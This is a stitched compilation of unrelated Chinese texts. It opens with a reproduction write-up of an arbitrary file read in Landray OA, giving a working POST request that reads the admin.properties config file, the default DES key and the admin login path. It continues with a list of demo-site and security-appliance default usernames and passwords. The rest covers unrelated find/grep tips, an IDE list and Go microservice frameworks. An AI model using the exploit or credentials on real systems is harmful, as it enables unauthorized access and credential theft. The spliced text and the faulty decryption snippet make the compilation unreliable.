X凌OA系统任意文件读取-DES解密

一、漏洞描述

深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用漏洞获取敏感信息

二、漏洞影响

蓝凌OA

三、

利用 蓝凌OA custom.jsp 任意文件读取漏洞 读取配置文件

读取路径：

/WEB-INF/KmssConfig/admin.properties

读取文件：

POC：

POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1Host: 127.0.0.1User-Agent: Go-http-client/1.1Content-Length: 60Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipvar={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}

获取密码DES解密登陆后台：默认密钥为 kmssAdminKey

访问后台登台：

http://127.0.0.1/admin.do

成功登陆后台：

编写POC脚本验证：

还需要自己去验证解密：

编写本地DES解密：

def decrypt_str(s): k = des(Des_Key, ECB, Des_IV, pad=None, padmode=PAD_PKCS5) decrystr = k.decrypt(base64.b64decode(s)) print(decrystr) return decrypt_str

发现key字符过长：

ValueError: Invalid DES key size. Key must be exactly 8 bytes long.

密钥长了，查了一下下 需要前面8位就OK 也能解开

直接解密明文：

参考：

https://github.com/Cr4y0nXX/LandrayReadAnyFile

免责声明：本站提供安全工具、程序(方法)可能带有攻击性，仅供安全研究与教学之用，风险自负!

如果本文内容侵权或者对贵公司业务或者其他有影响，请联系作者删除。

转载声明：著作权归作者所有。商业转载请联系作者获得授权，非商业转载请注明出处。

订阅查看更多复现文章、学习笔记

thelostworld

安全路上，与你并肩前行！！！！

作者：thelostworldSec
链接：https://www.jianshu.com/p/bdc88328fc6c
来源：简书
著作权归作者所有。商业转载请联系作者获得授权，非商业转载请注明出处。

    1、今目标
地址：http://web.jingoal.com/mgt/
用户名：admin@8216261
密码：1a2s3d4f5g

2、IBOS博思协同
地址：http://demo.ibos.com.cn/?r=user/default/login
页面默认可登录

3、Soffice赛飞OA
地址：http://oa.isoffice.cn/
页面默认可登录

4、企明岛
地址：https://passport.qimingdao.com/p-login
用户名：2660030799@qq.com
密码：1a2s3d4f5g

5、明道OA
地址：https://www.mingdao.com/feed
用户名：2660030799@qq.com
密码：1a2s3d4f5g

6、WORKTILE
https://worktile.com/signin
用户名：2660030799@qq.com
密码：1a2s3d4f5g

7、通达oa
http://oa.tongda2000.com/
用户名：lijia
密码：空
8、华天动力
http://demo.oa8000.com
用户名：admin
密码：123456

9、金和OA
http://demos.jh0101.com/ioas/
用户名 ：默认选择密码：空

10、绿叶OA
http://enp.oa169.com/
用户名：tf
密码：默认
安全码：073801

11、极限OAhttp://oa.sohuu.com:81/
用户名：wxg
密码：空

12、黄城OAhttp://www.hcesoft.com/
用户名：bmjl
密码：空

13、思道OA
http://24oa.cn
用户名：aaa
密码：空
14、宇博OA
http://bz.yubosoft.cn/Admin/Login.aspx
用户名：admin
密码：123

15、天翎OA
http://www.teemlink.com/tuiguang/beta/index.html?type=2#anames
用户名：默认
密码：默认

16、点晴OA
http://www.clicksun.com.cn/index_out.asp
用户名：默认
密码：默认

17、中服oa
http://my.cserver.com.cn/mysystem/mysystem.do
用户名：2660030799@qq.com
密码：1a2s3d4f5g

18、蓝凌OA
http://eisdemo.landray.com.cn
用户名：luor
密码：26012345

19、蓝晓OA
http://oa.lanxiao.net:2234
用户名：马云
密码：a
20、iwork365
http://www.iwork365.com/login
用户名：2660030799@qq.com
密码：1a2s3d4f5g

21、78OA
http://v4.78oa.com
用户名：test1
密码：无
22、深信通
http://eone.sxt.com.cn
页面最下方扫描二维码

23、i8小时oa
http://www.i8xiaoshi.com/
通过手机注册进入
24、小微oa
http://demo.smeoa.com/index.php/login
用户名：admin
密码：admin

24、plesk panel 虚拟主机管理平台
http://xxxxxx.com:8880
默认的管理员账户密码是admin   密码stepu

25 山石网科
hillstone
hillstone

26 阿姆瑞特防火墙
admin
manager

27绿盟安全审计系统
weboper
weboper

find命令详解

查找文件
find ./ -type f

查找目录
find ./ -type d

查找名字为test的文件或目录
find ./ -name test

查找名字符合正则表达式的文件,注意前面的‘.*’(查找到的文件带有目录)
find ./ -regex .*so.*\.gz

查找目录并列出目录下的文件(为找到的每一个目录单独执行ls命令，没有选项-print时文件列表前一行不会显示目录名称)
find ./ -type d -print -exec ls {} \;

查找目录并列出目录下的文件(为找到的每一个目录单独执行ls命令,执行命令前需要确认)
find ./ -type d -ok ls {} \;

查找目录并列出目录下的文件(将找到的目录添加到ls命令后一次执行，参数过长时会分多次执行)
find ./ -type d -exec ls {} +

查找文件名匹配*.c的文件
find ./ -name \*.c

打印test文件名后，打印test文件的内容
find ./ -name test -print -exec cat {} \;

不打印test文件名，只打印test文件的内容
find ./ -name test -exec cat {} \;

查找文件更新日时在距现在时刻二天以内的文件
find ./ -mtime -2

查找文件更新日时在距现在时刻二天以上的文件
find ./ -mtime +2

查找文件更新日时在距现在时刻一天以上二天以内的文件
find ./ -mtime 2

查找文件更新日时在距现在时刻二分以内的文件
find ./ -mmin -2

查找文件更新日时在距现在时刻二分以上的文件
find ./ -mmin +2

查找文件更新日时在距现在时刻一分以上二分以内的文件
find ./ -mmin 2

查找文件更新时间比文件abc的内容更新时间新的文件
find ./ -newer abc

查找文件访问时间比文件abc的内容更新时间新的文件
find ./ -anewer abc

查找空文件或空目录
find ./ -empty

查找空文件并删除
find ./ -empty -type f -print -delete

查找权限为644的文件或目录(需完全符合)
find ./ -perm 664

查找用户/组权限为读写，其他用户权限为读(其他权限不限)的文件或目录
find ./ -perm -664

查找用户有写权限或者组用户有写权限的文件或目录
find ./ -perm /220
find ./ -perm /u+w,g+w
find ./ -perm /u=w,g=w

查找所有者权限有读权限的目录或文件
find ./ -perm -u=r

查找用户组权限有读权限的目录或文件
find ./ -perm -g=r

查找其它用户权限有读权限的目录或文件
find ./ -perm -o=r

查找所有者为lzj的文件或目录
find ./ -user lzj

查找组名为gname的文件或目录
find ./ -group gname

查找文件的用户ID不存在的文件
find ./ -nouser

查找文件的组ID不存在的文件
find ./ -nogroup

查找有执行权限但没有可读权限的文件
find ./ -executable \! -readable

查找文件size小于10个字节的文件或目录
find ./ -size -10c

查找文件size等于10个字节的文件或目录
find ./ -size 10c

查找文件size大于10个字节的文件或目录
find ./ -size +10c

查找文件size小于10k的文件或目录
find ./ -size -10k

查找文件size小于10M的文件或目录
find ./ -size -10M

查找文件size小于10G的文件或目录
find ./ -size -10G

Linux查找文件内容的常用命令方法 

从文件内容查找匹配指定字符串的行：

$ grep "被查找的字符串" 文件名
例子：在当前目录里第一级文件夹中寻找包含指定字符串的.in文件
grep "thermcontact" */*.in

从文件内容查找与正则表达式匹配的行：
$ grep –e “正则表达式” 文件名

查找时不区分大小写：
$ grep –i "被查找的字符串" 文件名

查找匹配的行数：
$ grep -c "被查找的字符串" 文件名


从文件内容查找不匹配指定字符串的行：
$ grep –v "被查找的字符串" 文件名


从根目录开始查找所有扩展名为.log的文本文件，并找出包含”ERROR”的行
find / -type f -name "*.log" | xargs grep "ERROR"
例子：从当前目录开始查找所有扩展名为.in的文本文件，并找出包含”thermcontact”的行
find . -name "*.in" | xargs grep "thermcontact"

主流开发语言和开发环境介绍·文章目录

⭐️ 主流开发语言：2024年2月编程语言排行榜（TIOBE前十）

⭐️ 主流开发语言开发环境介绍

1.Python

1.1 **IDLE**

1.2 ⭐️PyCharm

1.3 **Anaconda**

1.4 **Jupyter Notebook**

1.5 **Sublime Text**

2.C

2.1 Dev-C++

2.2 Code::Blocks

2.3 ⭐️Visual Studio Code

2.4 **Eclipse**

3.C++

3.1 Turbo C

3.2 C++ Builder

3.3 Dev C++

3.4 Code::Blocks

3.5 ⭐️Visual Stadio

4.Java

4.1 Eclipse

4.2 NetBeans

4.3 BlueJ

4.4 IntelliJ IDEA

4.5 jEdit

4.6 DrJava

4.7 ⭐️Android Studio

5.C#

5.1 ⭐️Visual Studio

5.2 Visual Studio Code

5.3 .NET Framework

5.4 .NET Core

5.5 Xamarin

5.6 Unity

5.7 Mono

6.JavaScript

6.1 Visual Studio Code

6.2 Sublime Text

6.3 Atom

6.4 ⭐️WebStorm

7.SQL

7.1 Adminer

7.2 DBeaver

7.3 ⭐️Microsoft SQL Server Management Studio Express

7.4 RazorSQL

7.5 SQuirreL SQL

7.6 Datapine SQL Editor

7.7 MySQL Workbench

7.8 Oracle SQL Developer

7.9 Valentina Studio

7.10 DbForge Studio

8.GO

8.1 LiteIDE

8.2 ⭐️Goland

8.3 Sublime Text

8.4 Visual Studio Code

8.5 Eclipse

9.Visual Basic

9.1 ⭐️Microsoft Visual Basic

10.PHP

10.1 ⭐️Zend Studio

10.2 Eclipse

10.3 PHPED

10.4 PHPEdit

10.5 Komodo

10.6 PHPnow

10.7 EclipsePHP Studio

10.8 PHPStudy

10.9 PHPDesigner

10.10 CodeLobster PHP Edition

10.11 PHPStorm

————————————————

                            版权声明：本文为博主原创文章，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接和本声明。

原文链接：https://blog.csdn.net/molangmolang/article/details/136180496

o语言有微服务框架，例如：1、istio，是一个开源的微服务管理、保护和监控框架；2、go-kit，是一个go语言的分布式开发包，用于开发微服务；3、go-zero，是一个集成了各种工程实践的web和rpc框架；4、go-micro，是一个专注于简化分布式系统开发的微服务生态系统；5、kratos；6、cloudwego-kitex；7、goa；8、dubbo-go等等。

本教程操作环境：windows7系统、GO 1.18版本、Dell G3电脑。

微服务框架是将某个应用程序开发划分为对许多小型服务独立的进行业务开发，这些服务一般围绕业务规则进行构建，可以用不同的语言开发，使用不同的数据存储，最终使得每个服务运行在自己的行程中。并且它们之间采用轻量级通信机制进行通信。

那么有基于go语言的微服务框架吗？答案是：有！下面就来分享一些Go语言开发的微服务框架。

1.Istio（31.7K）

项目简介：Istio是由Google、IBM和Lyft开源的微服务管理、保护和监控框架。使用istio可以很简单的创建具有负载均衡、服务间认证、监控等功能的服务网络，而不需要对服务的代码进行任何修改。

仓库地址：https://github.com/istio/istiohttps://github.com/istio/istio

官方文档地址：https://istio.io/latest/docs/https://istio.io/latest/docs/

2.Go-kit（24.1K）

项目简介：Go-kit 是一个 Go 语言的分布式开发包，用于开发微服务。

仓库地址：https://github.com/go-kit/kit/https://github.com/go-kit/kit/

官方文档地址：https://gokit.io/

3.Go-zero（24.1K）

项目简介：go-zero 是一个集成了各种工程实践的 web 和 rpc 框架。

仓库地址：https://github.com/tal-tech/go-zerohttps://github.com/tal-tech/go-zero

官方文档地址：https://go-zero.dev/cn/docs/introduction

4.Go-micro（19.6K）

项目简介：Micro是一个专注于简化分布式系统开发的微服务生态系统。可插拔的插件化设计，提供强大的可插拔的架构来保证基础组件可以被灵活替换。

仓库地址：https://github.com/asim/go-micro

官方文档地址：https://go-micro.dev/

中文文档：介绍 · go-micro 微服务开发中文手册 · 看云Micro是一个微服务生态系统。目标是简化分布式系统开发。技术正在迅速发展。现在云计算能够给我们几乎是无限的scale能力，但是采用现有工具来使用scale能力仍然是很困难的。Micro试图去解决这个问题，开发人员首先关注。Micro的核心是简单易用，任何人都可以轻松开始编写微服务。随着您扩展到数百种服务，Micro将提供管理微服务环境所需的基本工具https://www.kancloud.cn/linimbus/go-micro/529015 

5.Kratos（19.2K）

项目简介：哔哩哔哩(B站)开源的一套Go微服务框架，包含大量微服务相关框架及工具。

仓库地址：https://github.com/cloudwego/kitex

官方文档地址：https://go-kratos.dev/docs/

6.CloudWeGo-Kitex（5.2K）

项目简介：字节跳动，KiteX 自 2020.04 正式发布以来，公司内部服务数量 8k+，QPS 过亿。KiteX 是字节跳动框架组研发的下一代高性能、强可扩展性的 Go RPC 框架。除具备丰富的服务治理特性外，相比其他框架还有以下特点：集成了自研的网络库 Netpoll；支持多消息协议（Thrift、Protobuf）和多交互方式（Ping-Pong、Oneway、 Streaming）；提供了更加灵活可扩展的代码生成器。

仓库地址：https://github.com/cloudwego/kitex

官方文档地址：https://www.cloudwego.io/zh/docs/overview/

7.Goa（4.9K）

项目简介：Goa 是一款用 Go 用于构建微服务的框架，采用独特的设计优先的方法

仓库地址：https://github.com/goadesign/goa

官方文档地址：https://goa.design/

8.Dubbo-go（4.2K）

项目简介：阿里，由Apache 软件基金会官方发布Go 语言加入 Dubbo 生态，架构是基于dubbo的extension模块和分层的代码设计，主要解决 Go 项目与 Java & Dubbo 项目的互通问题，同时也为 Go 项目提供了一种 RPC 与微服务

仓库地址：https://github.com/apache/dubbo-go

官方文档地址：https://dubbogo.github.io/dubbo-go-website/zh-cn/

9.Jupiter（3.9K）

项目简介：斗鱼开源的一套微服务治理框架，提供丰富的后台功能，管理应用的资源、配置，应用的性能、配置等可视化。

仓库地址：https://github.com/douyu/jupiter

官方文档地址：http://jupiter.douyu.com/

10.Tars-go（3.1K）

项目简介：腾讯，Tarsgo是基于Golang编程语言使用Tars协议的高性能RPC框架

仓库地址：https://github.com/TarsCloud/TarsGo

官方文档地址：https://tarscloud.github.io/TarsDocs/SUMMARY.html#TarsGo

附：北极星-polaris-go

北极星是腾讯开源的服务发现和治理中心，致力于解决分布式或者微服务架构中的服务可见、故障容错、流量控制和安全问题。

仓库地址：https://github.com/polarismesh/polaris

官方文档地址：https://polarismesh.cn/#/

11.Jaeger

Jaeger是Uber的分布式跟踪系统 ，基于google dapper的原理构建， 以Cassandra作为存储层。

12.fabio

fabio是ebay团队用golang开发的一个快速、简单零配置能够让consul部署的应用快速支持http(s)的负载均衡路由器。【相关推荐：Go视频教程】

13.gizmo

gizmo是纽约时报开源的go微服务工具，提供如下特性:标准化配置和日志;可配置策略的状态监测端点;用于管理pprof端点和日志级别的配置;结构化日志，提供基本请求信息;端点的有用度量;优雅的停止服务; 定义期待和词汇的基本接口。

14.kite

kite是一个基于go语言的微服务框架, Kite是Koding公司内部的一个框架, 该框架提供服务发现，多种认证功能，服务端通过RPC进行通信，同时还提供了websocket的js库，方便浏览器于服务器间进行通信。

15.hystrix-go

hystrix-go是用来隔离远程系统调用，第三方库调用，服务调用，提供熔断机制，避免雪崩效应的库， Hystrix的go版本。注Hystrixs是Netflix开源的一个java库。

16.Gateway

Gateway是一个使用go实现的基于HTTP的API网关。特性：API聚合; 流控; 熔断; 负载均衡; 健康检查; 监控; 消息路由; 后端管理WebUI。能做什么：规划更友好的URL给调用者。聚合多个API的结果返回给API调用者，利于移动端，后端可以实现原子接口。保护后端API服务不会被突发异常流量压垮。提供熔断机制，使得后端API Server具备自我恢复能力。借助消息路由能力，实现灰度发布，AB测试。

17.rainbond

云帮是一款以应用为中心的开源PaaS，深度整合Kubernetes的容器管理和Service Mesh微服务架构最佳实践，满足支撑业务高速发展所需的敏捷开发、高效运维和精益管理需求。

18.appdash

appdash是一款go版本的分布式应用跟踪系统， 基于google dapper的原理构建。

19.Hprose

Hprose是高性能远程对象服务引擎的缩写——微服务首选引擎。它是一个先进的轻量级的跨语言跨平台面向对象的高性能远程动态通讯中间件。它不仅简单易用，而且功能强大。你只需要稍许的时间去学习，就能用它轻松构建跨语言跨平台的分布式应用系统。

更多编程相关知识，请访问：编程视频！！

以上就是go语言有微服务框架吗的详细内容，更多请关注php中文网其它相关文章！